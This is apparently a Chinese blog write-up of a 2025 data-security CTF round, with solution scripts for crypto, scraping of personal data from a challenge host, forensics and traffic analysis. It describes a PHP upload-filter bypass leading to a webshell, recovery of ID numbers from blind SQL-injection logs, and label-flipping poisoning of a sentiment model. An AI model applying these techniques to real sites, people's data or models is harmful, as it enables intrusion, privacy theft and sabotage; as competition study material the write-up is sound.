2025数字中国 数据安全产业积分争夺赛 初赛wp

数据安全

AS

import math

def solve_pell(D):
    """使用连分数法求解Pell方程的基本解"""
    sqrtD = int(math.isqrt(D))
    if sqrtD * sqrtD == D:
        return None  # D是平方数,无解

    m = 0
    d = 1
    a = sqrtD
    num1, num = 1, a
    den1, den = 0, 1

    while num*num - D*den*den != 1:
        m = d * a - m
        d = (D - m*m) // d
        a = (sqrtD + m) // d

        num, num1 = a * num + num1, num
        den, den1 = a * den + den1, den

    return (num, den)

def generate_solutions(D, base_sol, min_exponent=10):
    """通过递归快速幂生成满足条件的解"""
    x1, y1 = base_sol
    xn, yn = x1, y1
    solutions = []

    # 生成直到满足条件的解
    while True:
        k = xn
        y = yn
        n1 = (k - 1) // 2
        n2 = y

        # 检查是否满足条件
        threshold = 1 << 0x149f  # 2^5279
        if n1 > threshold and n2 > threshold:
            return (n1, n2)

        # 更新解到下一个更大的解
        xn, yn = x1 * xn + D * y1 * yn, x1 * yn + y1 * xn

if __name__ == "__main__":
    D = 8 * 5279  # 42232
    base_sol = solve_pell(D)

    if base_sol:
        x_base, y_base = base_sol
        print(f"基本解: (k={x_base}, y={y_base})")

        # 生成满足条件的解
        n1, n2 = generate_solutions(D, base_sol)
        print(f"\n满足条件的解:")
        print(f"n1 = {n1}")
        print(f"n2 = {n2}")
    else:
        print("D是平方数,无解")

ez_upload

上传文件,发现可以上传phtml,

又发现内容中不允许包含php,使用大小写绕过

写入文件马后蚁剑连接,

发现密钥就在www目录下

模型安全

数据预处理

1

用到的脚本

爬取网站脚本

import requests
from bs4 import BeautifulSoup
import time
import random

def scrape_product_reviews(product_id, file):
    url = f"http://47.117.190.214:32879/index.php?controller=product&action=detail&id={product_id}"

    try:
        # 添加随机延迟避免被封(1-3秒)
        time.sleep(random.uniform(0, 0.2))

        response = requests.get(url)
        response.raise_for_status()

        soup = BeautifulSoup(response.text, 'html.parser')
        reviews = soup.find_all('div', class_='review-item')

        for review in reviews:
            # 初始化字段默认值
            user_id = "无"
            username = "无"
            phone = "无"
            content = "无"

            # 提取用户信息
            user_info = review.find('div', class_='reviewer-info')
            if user_info:
                user_id_tag = user_info.find('span', class_='user-id')
                if user_id_tag:
                    user_id = user_id_tag.text.split(':')[-1].strip()

                username_tag = user_info.find('span', class_='reviewer-name')
                if username_tag:
                    username = username_tag.text.split(':')[-1].strip()

                phone_tag = user_info.find('span', class_='reviewer-phone')
                if phone_tag:
                    phone = phone_tag.text.split(':')[-1].strip()

            # 提取评论内容
            content_tag = review.find('div', class_='review-content')
            if content_tag:
                content = content_tag.text.strip()

            # 写入文件
            file.write(
                f"用户ID: {user_id}\n"
                f"用户名: {username}\n"
                f"手机号: {phone}\n"
                f"评论文本: {content}\n"
                f"商品ID: {product_id}\n"
                f"\n{'=' * 30}\n\n"  # 添加分隔线
            )

    except Exception as e:
        print(f"爬取商品 {product_id} 时出错: {str(e)}")

# 打开文本文件
with open('product_reviews.txt', 'w', encoding='utf-8') as file:
    # 写入文件头
    file.write("商城用户评价数据\n")
    file.write(f"生成时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n\n")

    # 循环爬取1-500号商品
    for product_id in range(1, 501):
        print(f"正在爬取商品ID: {product_id}")
        scrape_product_reviews(product_id, file)

print(f"爬取完成! 数据已保存到 product_reviews.txt")

从product_reviews.txt提取手机号姓名id并md5加密

import hashlib

def generate_md5(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        current_entry = {}
        for line in f_in:
            line = line.strip()

            # 检测分隔符
            if line.startswith('=' * 30):
                # 处理完整条目
                if all(key in current_entry for key in ['用户ID', '用户名', '手机号']):
                    # 构建待加密字符串
                    raw_str = f"{current_entry['用户ID']}{current_entry['用户名']}{current_entry['手机号']}"
                    # 生成MD5
                    print(raw_str)
                    md5_hash = hashlib.md5(raw_str.encode('utf-8')).hexdigest()
                    # 写入格式化结果
                    f_out.write(f"{md5_hash}\n")

                current_entry = {}
                continue

            # 解析字段
            if ':' in line:
                key, value = line.split(':', 1)
                key = key.strip()
                value = value.strip()
                current_entry[key] = value

# 执行生成
if __name__ == "__main__":
    generate_md5('product_reviews.txt', 'md5_2.txt')
    print("MD5加密完成,结果已保存到 md5.txt")

从product_reviews.txt获取评论和对应的用户id

def extract_reviews(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        current_entry = {}
        for line in f_in:
            # 去除首尾空白字符
            cleaned_line = line.strip()

            # 检测分隔符(匹配由30个=组成的行)
            if cleaned_line == '=' * 30:
                if current_entry.get('用户ID') and current_entry.get('评论文本'):
                    f_out.write(f"{current_entry['用户ID']}:{current_entry['评论文本']}\n")
                current_entry = {}
                continue

            # 解析用户ID
            if cleaned_line.startswith('用户ID:'):
                current_entry['用户ID'] = cleaned_line.split(':', 1)[1].strip()

            # 解析评论文本
            if cleaned_line.startswith('评论文本:'):
                current_entry['评论文本'] = cleaned_line.split(':', 1)[1].strip()

if __name__ == "__main__":
    extract_reviews('product_reviews.txt', 'reviews.txt')
    print("数据提取完成,结果已保存到 reviews.txt")

然后交给ai手动处理得到每个id对应的评价是否正面

最后由脚本自动获取 review2.txt md5.txt的内容生成csv

import csv
import re

def load_review_data(file_path):
    """加载评论标签数据"""
    reviews = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue

            # 使用partition确保只分割第一个冒号
            user_id, sep, label = line.partition(':')
            if not sep:
                print(f"[警告] 第{line_num}行格式错误: {line}")
                continue

            user_id = user_id.strip()
            label = label.strip()

            # 验证标签有效性
            if label not in ('0', '1'):
                print(f"[警告] 第{line_num}行无效标签: {label}")
                continue

            reviews[user_id] = label
    return reviews

def load_md5_data(file_path):
    """加载MD5签名数据"""
    md5_pattern = re.compile(r'^[a-f0-9]{32}$')
    signatures = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue

            user_id, sep, md5 = line.partition(':')
            if not sep:
                print(f"[警告] 第{line_num}行格式错误: {line}")
                continue

            user_id = user_id.strip()
            md5 = md5.strip().lower()  # MD5统一转为小写

            # 验证MD5格式
            if not md5_pattern.match(md5):
                print(f"[警告] 第{line_num}行无效MD5: {md5}")
                continue

            signatures[user_id] = md5
    return signatures

def generate_csv(reviews, signatures, output_file):
    """生成最终CSV文件"""
    matched = 0
    missing = []

    with open(output_file, 'w', encoding='utf-8', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['user_id', 'label', 'signature'])

        for user_id, label in reviews.items():
            if user_id in signatures:
                writer.writerow([user_id, label, signatures[user_id]])
                matched += 1
            else:
                missing.append(user_id)

    # 输出统计信息
    print(f"成功匹配记录数: {matched}")
    if missing:
        print(f"未找到MD5签名的用户ID数量: {len(missing)}")
        print(f"示例缺失ID: {', '.join(missing[:3])}...")

if __name__ == "__main__":
    # 文件路径配置
    REVIEW_FILE = "review2.txt"
    MD5_FILE = "md5.txt"
    OUTPUT_FILE = "result.csv"

    # 加载数据
    print("正在加载评论数据...")
    review_data = load_review_data(REVIEW_FILE)
    print(f"加载到有效评论记录: {len(review_data)}条")

    print("\n正在加载MD5数据...")
    md5_data = load_md5_data(MD5_FILE)
    print(f"加载到有效MD5记录: {len(md5_data)}条")

    # 生成CSV文件
    print("\n正在生成合并文件...")
    generate_csv(review_data, md5_data, OUTPUT_FILE)
    print(f"\n结果已保存至: {OUTPUT_FILE}")

暂时无法在飞书文档外展示此内容

2

使用脚本

通过爬虫抓取各个商品的特征值,进行数据匹配,生成表格

import requests
import csv
import re
from bs4 import BeautifulSoup

def get_category_id(product_name):

    if "花卉" in product_name:
        return 23
    if "园艺" in product_name and "花卉" not in product_name:
        return 25

    # 定义关键词映射(部分关键词仅为示例)
    mapping = [
        (1, ["手机", "oneplus", "iphone", "oppo", "vivo", "华为"]),
        (2, ["母婴"]),
        (3, ["家居"]),
        (4, ["书", "著作", "物种起源", "达尔文"]),
        (5, ["蔬菜"]),
        (6, ["厨房"]),
        (7, ["办公"]),
        (8, ["水果", "桑葚", "苹果", "香蕉", "橙子"]),
        (9, ["宠物"]),
        (10, ["运动"]),
        (11, ["热水器", "恒温"]),
        (12, ["彩妆"]),
        (13, ["保健品"]),
        (14, ["酒水"]),
        (15, ["玩具"]),
        (16, ["汽车"]),
        (17, ["床上"]),
        (18, ["洗发水", "洗护"]),
        (19, ["五金"]),
        (20, ["户外"]),
        (21, ["珠宝"]),
        (22, ["医疗"]),
        (24, ["游戏"]),
    ]
    name_lower = product_name.lower()
    for cid, keywords in mapping:
        for kw in keywords:
            if kw.lower() in name_lower:
                return cid
    # 如果没有匹配到,返回 0 表示未知分类
    return 0

def parse_sales(sales_str):
    """
    解析销量字符串,例如"月销量: 720件",提取数字并进行数据清洗,
    如果销量为负则返回0。
    """
    match = re.search(r'月销量:\s*(-?\d+)', sales_str)
    if match:
        sales = int(match.group(1))
        return sales if sales > 0 else 0
    return 0

def get_review_count(product_detail_url):
    """
    访问商品详情页,根据页面中评论区域(假设评论项的 class 为'review-item')统计评论数量。
    若无法访问或未找到评论,则返回 0。
    """
    try:
        resp = requests.get(product_detail_url, timeout=5)
        if resp.status_code != 200:
            return 0
        detail_soup = BeautifulSoup(resp.text, 'html.parser')
        # 根据实际详情页的结构调整下面的查找规则
        review_items = detail_soup.find_all(class_='review-item')
        return len(review_items)
    except Exception as e:
        print(f"Error fetching reviews from {product_detail_url}: {e}")
        return 0

def main():
    base_url = "http://47.117.190.214:32879/index.php?controller=home&action=index&page="
    products = []
    page = 1
    # 持续爬取页面直到获得500个商品或页面结束
    while len(products) < 500:
        url = base_url + str(page)
        print("Scraping page:", page)
        try:
            resp = requests.get(url, timeout=10)
        except Exception as e:
            print(f"Failed to retrieve page {page}: {e}")
            break
        if resp.status_code != 200:
            print("Failed to retrieve page:", page)
            break
        soup = BeautifulSoup(resp.text, 'html.parser')
        product_cards = soup.find_all(class_="product-card")
        if not product_cards:
            print("No product cards found on page:", page)
            break
        for card in product_cards:
            try:
                product_id_text = card.find(class_="product-id").get_text(strip=True)
                # 例如 "商品ID: 500"
                product_id = int(re.search(r'商品ID:\s*(\d+)', product_id_text).group(1))
                product_name = card.find(class_="product-name").get_text(strip=True)
                sales_text = card.find(class_="product-sales").get_text(strip=True)
                sales = parse_sales(sales_text)
                # 获取详情页链接,用于统计评论数
                product_link = card.find("a", class_="product-link")["href"]
                reviews_number = get_review_count(product_link)
                category_id = get_category_id(product_name)
                products.append({
                    "product_id": product_id,
                    "sales": sales,
                    "category_id": category_id,
                    "reviews_number": reviews_number
                })
                if len(products) >= 500:
                    break
            except Exception as e:
                print(f"Error parsing product card: {e}")
                continue
        page += 1

    # 按商品ID升序排列
    products = sorted(products, key=lambda x: x["product_id"])

    # 保存为 CSV 文件,确保编码为 UTF-8
    output_file = "submit_2.csv"
    with open(output_file, "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=["product_id", "sales", "category_id", "reviews_number"])
        writer.writeheader()
        for prod in products:
            writer.writerow(prod)
    print(f"Finished! {len(products)} products have been saved to {output_file}")

if __name__ == "__main__":
    main()

3

同样是使用第一题的爬虫脚本 然后从product_reviews.txt获取内容

获取手机号并加密保存

import re

def process_phone(phone):
    """处理手机号格式,保留前3位和后4位"""
    if len(phone) != 11 or not phone.isdigit():
        return None
    return f"{phone[:3]}****{phone[-4:]}"

def extract_phones(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        # 定义匹配模式
        id_pattern = re.compile(r'用户ID:\s*(\d+)')
        phone_pattern = re.compile(r'手机号:\s*(\d{11})')

        current_id = None
        current_phone = None

        for line in f_in:
            line = line.strip()

            # 匹配用户ID
            if id_match := id_pattern.search(line):
                current_id = id_match.group(1)

            # 匹配手机号
            elif phone_match := phone_pattern.search(line):
                raw_phone = phone_match.group(1)
                if processed_phone := process_phone(raw_phone):
                    current_phone = processed_phone

            # 遇到分隔符时写入结果
            if line.startswith('========'):
                if current_id and current_phone:
                    f_out.write(f"{current_id}:{current_phone}\n")
                # 重置临时变量
                current_id = None
                current_phone = None

if __name__ == "__main__":
    extract_phones('product_reviews.txt', 'phone.txt')
    print("手机号提取完成,结果已保存到 phone.txt")

然后直接生成csv,关于user-agent检验使用手动输入

import csv

def convert_to_csv(input_file, output_file):
    """
    将phone.txt转换为指定格式的CSV文件
    :param input_file: 输入文件名
    :param output_file: 输出文件名
    """
    try:
        with open(input_file, 'r', encoding='utf-8') as f_in, \
                open(output_file, 'w', encoding='utf-8', newline='') as f_out:

            # 创建CSV写入器
            writer = csv.writer(f_out)
            # 写入表头
            writer.writerow(['user_id', 'desensitization'])

            # 处理数据行
            for line_num, line in enumerate(f_in, 1):
                line = line.strip()
                if not line:
                    continue

                # 分割数据
                if ':' not in line:
                    print(f"第{line_num}行格式错误,缺少冒号分隔符: {line}")
                    continue

                user_id, desensitization = line.split(':', 1)
                user_id = user_id.strip()
                desensitization = desensitization.strip()

                # 验证数据有效性
                if not user_id.isdigit():
                    print(f"第{line_num}行包含非数字用户ID: {user_id}")
                    continue

                if len(desensitization) != 11 or '****' not in desensitization:
                    print(f"第{line_num}行脱敏格式异常: {desensitization}")
                    continue

                # 写入CSV
                writer.writerow([user_id, desensitization])

    except FileNotFoundError:
        print(f"错误:文件 {input_file} 不存在")
    except Exception as e:
        print(f"处理过程中发生未知错误: {str(e)}")

if __name__ == "__main__":
    # 配置参数
    INPUT_FILE = "phone.txt"
    OUTPUT_FILE = "phone_data.csv"

    # 执行转换
    convert_to_csv(INPUT_FILE, OUTPUT_FILE)
    print(f"文件转换完成,结果已保存至 {OUTPUT_FILE}")

暂时无法在飞书文档外展示此内容

模型对抗投毒

1

通过对模型的和向量器的分析,找到了尽可能对两种判断结果影响大的关键词,分别为垃圾和不错,将其写入表格,对数据进行投毒,影响其结果(csv数据在最后)

2

生成不超过100条、每条不超过20字符的投毒数据。这些数据需要将正向词标记为负面标签,负向词标记为正面标签。所以,我需要确保脚本能够生成这样的数据,并且符合字符限制。

构建正反向词库。正向词库应该包含常见的积极评价词汇,比如“好”、“推荐”、“满意”等,而反向词库则包含负面词汇,如“差”、“失望”、“糟糕”。这些词汇需要足够多样化,以确保覆盖尽可能多的场景,从而提高模型中毒的效果。

生成样本的方法。每个样本应该由一个或多个关键词组成,可能加上修饰词,比如“非常”、“极其”等,来增加样本的多样性。同时,要确保每条样本的字符数不超过20。这里需要一个函数来随机组合关键词和修饰词,并检查长度是否符合要求。

定义正反向词库和修饰词。随机生成样本,组合修饰词和关键词,检查样本长度和重复性,然后分配正确的标签。(csv数据在最后)

数据分析

溯源与取证

1

R-StudioPortable打开,发现文件全部被删除,提取出所有文件

重要文件里有隐藏文字

2

内存用volatility分析,发现truecrypt加密,dump出进程里的内存,然后解密log文件进行挂载,得到两个日志文件

3

日志文件发现为布尔盲注,布尔盲注成功时响应长度为704,用awk提取出所有包含704的行, 再用

awk 'match($0, /select%20id_card%20from%20info%20limit%20([0-9]{1,3}),1\),([0-9]{1,3}),1\)\)=([0-9]{1,3})/, a) {print a[1], a[2], a[3]}' 1.txt | sort -k 1,2 -n | uniq | python 1.py

配合脚本,得到身份证号

import sys

# 初始化可动态扩展的字符串列表
str_list = []

for line in sys.stdin:
    line = line.strip()
    if not line: continue

    try:
        # 解析三个数字
        str_pos, char_pos, ascii_code = map(int, line.split())

        # 转换为0-based索引
        list_idx = str_pos 
        char_idx = char_pos - 1

        # ASCII解码
        char = chr(ascii_code)

        # 动态扩展列表
        while len(str_list) <= list_idx:
            str_list.append("")  # 填充空字符串

        # 动态扩展目标字符串
        target_str = list(str_list[list_idx])
        while len(target_str) <= char_idx:
            target_str.append(" ")  # 填充空格

        # 替换字符
        target_str[char_idx] = char
        str_list[list_idx] = "".join(target_str)

    except Exception as e:
        print(f"处理错误: {line} -> {e}", file=sys.stderr)

# 输出结果
print("\n最终字符串列表:")
for idx, s in enumerate(str_list):
    print(f"[字符串{idx+1}] {s}")%   

[字符串1] 110101199001011234
[字符串2] 310115198502021234
[字符串3] 440305199503031234
[字符串4] 500101200012121234
[字符串5] 330106197708081234
[字符串6] 210202198609091234
[字符串7] 420103199912121234
[字符串8] 510104199311111234
[字符串9] 230107196504041234
[字符串10] 320508200005051234
[字符串11] 130104198707071234
[字符串12] 410105199206061234
[字符串13] 220203198808081234
[字符串14] 610112200109091234
[字符串15] 340104197612121234
[字符串16] 370202199404041234
[字符串17] 530102199810101234
[字符串18] 450305198303031234
[字符串19] 120105197411111234
[字符串20] 350203200202021234
[字符串21] 430104199707071234

[字符串1] WangWei
[字符串2] LiNa
[字符串3] ZhangQiang
[字符串4] ChenFang
[字符串5] LiuTao
[字符串6] ZhouMin
[字符串7] ZhaoGang
[字符串8] YangXue
[字符串9] HuangLei
[字符串10] XuLi
[字符串11] SunHao
[字符串12] ZhuLin
[字符串13] MaChao
[字符串14] HeJing
[字符串15] GaoFei
[字符串16] LinYan
[字符串17] GuoYong
[字符串18] LuoMin
[字符串19] LiangJun
[字符串20] SongJia
[字符串21] XieFang

按照首字母排列得,md5哈希后提交

500101200012121234340104197612121234530102199810101234610112200109091234230107196504041234120105197411111234310115198502021234370202199404041234330106197708081234450305198303031234220203198808081234350203200202021234130104198707071234110101199001011234430104199707071234320508200005051234510104199311111234440305199503031234420103199912121234210202198609091234410105199206061234

数据社工

1

navicat查看滴滴打车记录,得到经纬度,再通过经纬度搜索得到对应的小区名,在3处得到了公司名

2

见3

3

得到手机号以及公司名和身份证号

4

见3

5

之前得到手机号13891889377

在车的图片中寻找,全导入OCR中,从得到的结果中ctrl+F搜索,找到

数据攻防

1

pcapng流量包里导出http流,发现了盲注,手撕得到flag

2

wireshark过滤POST 到 upload的流量,发现两处流量包,经分析文件名为2.abc

3

脚本统计姓名出现次数并自动转换

import re
import json
from collections import defaultdict

def process_log(log_file, output_file):
    info_dict = defaultdict(lambda: {'phone': '', 'count': 0})

    with open(log_file, 'r', encoding='utf-8') as f:
        content = f.read()

    blocks = re.split(r'={5,}\n', content)

    for block in blocks:
        block = block.strip()
        if not block:
            continue
        lines = block.split('\n')
        if not lines[0].startswith('HTTP/'):
            continue
        try:
            header_end = lines.index('')
        except ValueError:
            continue
        body = '\n'.join(lines[header_end+1:])
        try:
            data = json.loads(body)
            name = data.get('name', '')
            phone = data.get('phone', '')
            if name and phone:
                if info_dict[name]['count'] == 0:
                    info_dict[name]['phone'] = phone
                    info_dict[name]['count'] = 1
                else:
                    info_dict[name]['count'] += 1
        except json.JSONDecodeError:
            continue

    with open(output_file, 'w', encoding='utf-8') as f:
        for name in info_dict:
            if info_dict[name]['count'] > 0:
                line = f"{name} {info_dict[name]['phone']} {info_dict[name]['count']}\n"
                f.write(line)

if __name__ == '__main__':
    process_log('http.log', '1.txt')

发现重名,手动筛选获得最终答案

王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇